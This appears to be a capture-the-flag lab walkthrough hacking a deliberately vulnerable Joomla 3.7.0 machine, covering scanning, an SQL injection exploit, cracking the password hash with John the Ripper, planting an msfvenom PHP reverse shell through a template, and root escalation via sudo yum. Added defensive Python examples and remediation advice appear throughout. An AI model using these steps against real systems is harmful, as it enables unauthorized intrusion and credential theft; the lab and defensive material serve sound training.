Before you start, ensure you’ve completed the Introduction to Metasploit lesson.
We’re going to hack into a vulnerable Linux machine using Metasploit. We’ll determine which vulnerabilities exist, run exploits, gain access, and become the root user.
Start Metasploit and ensure your database is up and running.
Then start this machine from TryHackMe.
Run the command “db_nmap -A -v <vulnerable_machine_ip>” and let the scan complete.
Check the open ports and services with the ‘services’ command. You’ll notice that Metasploit stored our work from the previous lesson.
Let’s start fresh by creating a new workspace.
Use this command:
workspace -a <name>
Now switch to it using the command:
workspace <name>
Run services again. You’ll see that it’s empty.
Since we created a new workspace, we need to re-run the Nmap scan on the vulnerable machine.
Run services when it’s finished. There are three open ports: ssh, http, and mysql.
Let’s start with port 22. Search Metasploit for vulnerabilities on that version of OpenSSH.
Nothing there. Move on to port 80.
First, visit the website. It’s a simple website with a login form.
Look back through the Nmap scan. There’s a path indicating that this is a Joomla website.
Let’s see if there are any vulnerabilities. First, try to find out the Joomla version so we can search for specific vulnerabilities.
Check out #14. Let’s use it!
It’s version 3.7.0. Tailor your exploit search for that specific version of Joomla.
Let’s use it and fill in the variables.
Now run the exploit.
No luck there. This is the reality of penetration testing: you may need to try several methods.
I searched Google and found this exploit. It will dump the user and session tables, which means we’ll get a username and password hash.
Note: I had to restart the TryHackMe machine. The new IP address is 10.10.87.14.
Go to the exploit page. Click Code → Joomblah → joomblah.py. Then click “Raw.”
The URL in the browser will change. Copy it.
Run the command ‘wget <url>’ to download the exploit.
Now run the file. Run it with Python 2 (you’ll get an error otherwise) and pass the vulnerable machine’s URL as a command-line argument, like this:
Nice! We got the username and password hash.
Run the “hashid” command and paste the password hash. Hit the enter key again, and it will determine the hash type used.
It seems to be bcrypt. Save the hash in a file (I created a file called “hash_file” and pasted it in using vim.)
Now execute these commands:
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
john <hash_file_name> --wordlist=/usr/share/wordlists/rockyou.txt
The first command unzips a file (rockyou.txt.gz) that comes with Kali Linux. It’s a list of over 14 million plaintext passwords that are commonly used.
The second command uses John The Ripper to crack the password hash using rockyou.txt as a wordlist.
It may take several minutes to finish.
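The same wordlist that makes john’s job easy is also the cheapest defence when passwords are set: a policy check that rejects anything the wordlist, plus the usual rule mangling, would recover. The following is an added example and not code from the original walkthrough. It uses a constructed five-entry stand-in for rockyou.txt, and the mangling rules in `mangled_forms` are an assumption about what a cracking rule set commonly tries, not John the Ripper’s actual rule file.

```python
"""Reject passwords that a wordlist attack would recover in seconds.

Added example, not part of the original walkthrough. SAMPLE_WORDLIST is a
constructed stand-in for rockyou.txt; load the real file in practice.
"""
import re

# Constructed miniature wordlist (rockyou.txt has over 14 million entries).
SAMPLE_WORDLIST = ["123456", "password", "spiderman", "iloveyou", "qwerty"]


def load_wordlist(lines):
    """Build a lowercase lookup set from wordlist lines, one entry per line."""
    return {line.strip().lower() for line in lines if line.strip()}


def mangled_forms(password):
    """Base words a cracking rule set would derive from the candidate.

    Assumed rules, modelled on what wordlist rule sets commonly try: the
    word as-is, case-folded, with a trailing run of digits or symbols removed,
    and with common leetspeak substitutions undone.
    """
    lowered = password.lower()
    stripped = re.sub(r"[\d!@#$%^&*.?]+$", "", lowered)
    unleet = stripped.translate(str.maketrans("0134@$", "oieaas"))
    return {form for form in (password, lowered, stripped, unleet) if form}


def reject_reason(password, wordlist, min_length=12):
    """Return why the password is unacceptable, or None if it passes."""
    if len(password) < min_length:
        return f"shorter than {min_length} characters"
    for form in mangled_forms(password):
        if form in wordlist:
            return f"derived from wordlist entry '{form}'"
    return None


if __name__ == "__main__":
    words = load_wordlist(SAMPLE_WORDLIST)
    for candidate in ("spiderman123", "Sp1derm4n!", "correct-horse-battery-staple"):
        print(f"{candidate}: {reject_reason(candidate, words, min_length=8) or 'ok'}")
```

The check deliberately tests the stripped and de-leeted forms, because a length rule alone would accept `spiderman123` even though it falls to the very first rule pass.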
Nice work! The password is spiderman123. I could log into the website using this password and the username “jonah”.
Note: for this section, I used a virtual machine with a different IP address. The new address is 10.10.97.14.
Let’s upload a shell and attempt to get root access.
Here’s what I did to get to the control panel:
I also used Google to find out how to upload a shell in Joomla. Follow along:
Head to Extensions → Templates → Templates
Click the second template:
Then click New File:
Let’s get a Metasploit php shell using Msfvenom.
Run this command:
msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=1337 -o shell.php
Now upload the file.
That didn’t work. Let’s try the other method.
Click “Create” and navigate to the shell.php file. Paste the code from the shell you generated with Msfvenom into it, then click save.
Now set up the listener on Metasploit.
In your browser, enter this URL:
http://<machine-ip>/templates/protostar/<filename>.php
We get the Meterpreter shell!
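From the defender’s side, the upload above leaves a clear trace in the web server access log: a POST to the template manager, followed by a request for a .php file in a template directory that the install never shipped. The following is an added example and not part of the original walkthrough. The log lines are constructed, `option=com_templates` is the component name assumed for the template manager, and `KNOWN_TEMPLATE_PHP` is an assumed baseline that in practice must be taken from a clean copy of the site.

```python
"""Flag web requests that execute unexpected PHP files under a template path.

Added example, not part of the original walkthrough. The log lines are
constructed; KNOWN_TEMPLATE_PHP is an assumed baseline for one template.
"""
import re

# Combined log format, constructed sample. 10.0.0.9 edits a template through
# the administrator interface, then requests a PHP file that was never shipped.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:10 +0000] "POST /administrator/index.php?option=com_templates HTTP/1.1" 303 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:15 +0000] "GET /templates/protostar/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:03:00 +0000] "GET /templates/protostar/css/template.css HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:03:05 +0000] "GET /templates/protostar/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP files directly inside a template directory (subfolders are ignored here).
TEMPLATE_PHP_RE = re.compile(r"^/templates/[^/]+/(?P<file>[^/?]+\.php)$")

# Assumed baseline of PHP files a template legitimately contains; build it
# from a clean copy of the site, not from the running server.
KNOWN_TEMPLATE_PHP = {"index.php", "error.php", "offline.php", "component.php"}


def parse(line):
    """Split one combined-format log line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def suspicious_template_requests(log_text):
    """Report PHP requests under /templates/ that are not in the baseline.

    Each finding records whether the same client had earlier posted to the
    template manager, which is the write path needed to place the file.
    """
    findings = []
    template_editors = set()
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and "option=com_templates" in rec["path"]:
            template_editors.add(rec["ip"])
        path = rec["path"].split("?", 1)[0]
        m = TEMPLATE_PHP_RE.match(path)
        if m and m.group("file") not in KNOWN_TEMPLATE_PHP:
            findings.append({
                "ip": rec["ip"],
                "path": path,
                "status": rec["status"],  # 200 means the server executed the file
                "after_template_edit": rec["ip"] in template_editors,
            })
    return findings


if __name__ == "__main__":
    for hit in suspicious_template_requests(SAMPLE_LOG):
        print(hit)
```

Run against a real log, the `after_template_edit` flag separates a stray scanner probing for a file that does not exist (typically a 404) from a client that first wrote through the administrator interface and then fetched what it wrote.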
Run the command “getuid”, and you’ll see we’re a low-privileged user. Let’s attempt some lateral movement.
That configuration file might contain something useful. Check it out:
I tried logging in as root with that password, but no luck there.
Let’s check the /home directory for available users.
There’s one: jjameson. Try to ssh as that user.
Note: My TryHackMe machine unexpectedly timed out, so I had to restart it. The new IP is 10.10.48.72.
It works! When asked for the password, I entered the one from the configuration file.
Let’s get root access. Try the “sudo -l” command. It shows a list of allowed and forbidden commands for the user.
As you can see, the user can run yum with sudo. Let’s see if we can use this binary to become the root user.
I like using GTFOBins for escalating privileges from binary files. You can search “yum” or click this link to access the code.
I tried option A, but it didn’t work for me. Try option B.
Run the command “whoami”. You’ll see that you’re the root user. Great work!
From here, you can change the password and get access from SSH. I recommend accessing from SSH because it is (usually) more functional than the earlier shell.
By “more functional,” I mean that SSH gives you a greater range of commands you can execute, and it’s easier to run commands using the keystrokes you’re used to. In some shells, the syntax for executing commands is confusing: pressing a key like the up arrow can cause an unexpected problem.
Here’s another reason to use SSH: you are initiating the connection to the victim machine. This is better than relying on a reverse shell, where the victim machine initiates an outbound connection back to you, since that connection can be closed unexpectedly.
Before we close, imagine you see this issue in your system. What should you do?
First, ensure your system is up to date. Old vulnerabilities are often fixed in the latest version of the software. Change the passwords and perform an integrity check afterwards.
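An integrity check is only meaningful against a baseline taken while the site was known-good. The following is an added example, not code from the original walkthrough: it records a SHA-256 manifest of every file under a web root and reports what was added, modified or removed since. `demo()` builds a constructed directory tree containing a placeholder `shell.php` and an edited `configuration.php` to show both kinds of change; those file names are illustrative assumptions.

```python
"""Baseline-and-compare integrity check for a web root.

Added example, not part of the original walkthrough. The tree built in
demo() is constructed; the placeholder shell.php contains no real code.
"""
import hashlib
import json
import os
import tempfile


def snapshot(root):
    """Map each file path (relative to root) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = digest.hexdigest()
    return manifest


def compare(baseline, current):
    """Return the paths added, modified or removed relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def save_manifest(manifest, path):
    """Write the manifest as JSON; keep this file off the web root."""
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def demo():
    """Constructed scenario: clean site, then a dropped file and an edited config."""
    with tempfile.TemporaryDirectory() as work:
        root = os.path.join(work, "webroot")
        tpl = os.path.join(root, "templates", "protostar")
        os.makedirs(tpl)
        cfg = os.path.join(root, "configuration.php")
        with open(cfg, "w") as fh:
            fh.write("<?php // site settings (constructed)\n")
        with open(os.path.join(tpl, "index.php"), "w") as fh:
            fh.write("<?php // template entry point (constructed)\n")

        manifest_path = os.path.join(work, "baseline.json")  # outside the web root
        save_manifest(snapshot(root), manifest_path)          # taken on the clean install

        # Simulated compromise: a dropped file and a tampered configuration.
        with open(os.path.join(tpl, "shell.php"), "w") as fh:
            fh.write("<?php // placeholder, not a real shell\n")
        with open(cfg, "a") as fh:
            fh.write("// tampered\n")

        return compare(load_manifest(manifest_path), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The manifest must be stored where the web application cannot write to it, otherwise an attacker who can drop files can also rewrite the baseline.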
To eliminate the privilege escalation problem, you can run this command:
vi /etc/sudoers
Then put a “!” sign before the binary file. This tells sudo that jjameson is not allowed to execute that binary.
You can also remove the sudo permissions from the jjameson user. This way, jjameson can’t execute commands normally reserved for the root user.
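Both fixes come down to what the user specification in sudoers says, so it is worth being able to check it mechanically. The following is an added example and not part of the original walkthrough: it parses sudoers-style lines, flags any non-negated command whose binary is on a small constructed deny-list of shell-capable programs, and shows that the “!”-prefixed version of the jjameson entry no longer triggers. The sample sudoers text, the `SHELL_CAPABLE` set and `HARDENED_SUDOERS` are all constructed; the real GTFOBins catalogue is much longer. Whichever fix you apply, edit with `visudo` (or run `visudo -cf` on the result) so a syntax error does not lock everyone out of sudo.

```python
"""Audit sudoers entries that hand a user a shell-capable binary as root.

Added example, not part of the original walkthrough. SAMPLE_SUDOERS,
HARDENED_SUDOERS and the SHELL_CAPABLE set are constructed.
"""
import re

SAMPLE_SUDOERS = """\
# constructed sample, not a real /etc/sudoers
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%wheel   ALL=(ALL) ALL
jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum
backup   ALL=(root) /usr/bin/rsync, !/usr/bin/yum
"""

# The page's fix: a '!' in front of the binary turns the grant into an exclusion.
HARDENED_SUDOERS = SAMPLE_SUDOERS.replace(
    "jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum",
    "jjameson ALL=(ALL) NOPASSWD: !/usr/bin/yum",
)

# Small constructed excerpt of binaries that can spawn a shell or write files
# when run as root; GTFOBins maintains the real catalogue.
SHELL_CAPABLE = {"yum", "vi", "vim", "find", "less", "python", "perl", "bash", "sh"}

# user  host=(runas) [NOPASSWD:] cmd[, cmd...]
ENTRY_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)


def parse_entries(text):
    """Yield (user, runas, nopasswd, [commands]) for each user specification."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        nopasswd = "NOPASSWD:" in cmds
        cmds = re.sub(r"(NO)?PASSWD:\s*", "", cmds)
        commands = [c.strip() for c in cmds.split(",") if c.strip()]
        yield m.group("user"), m.group("runas") or "root", nopasswd, commands


def findings(text):
    """Return one dict per non-negated grant of a shell-capable binary."""
    out = []
    for user, runas, nopasswd, commands in parse_entries(text):
        for cmd in commands:
            if cmd.startswith("!"):
                continue  # an exclusion, not a grant
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                out.append({"user": user, "runas": runas, "binary": binary,
                            "nopasswd": nopasswd, "command": cmd})
    return out


if __name__ == "__main__":
    print("weak:    ", findings(SAMPLE_SUDOERS))
    print("hardened:", findings(HARDENED_SUDOERS))
```

Removing the jjameson line altogether, the second fix the text mentions, gives the same empty result; the audit only cares that no non-negated shell-capable command remains.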
Thanks for reading!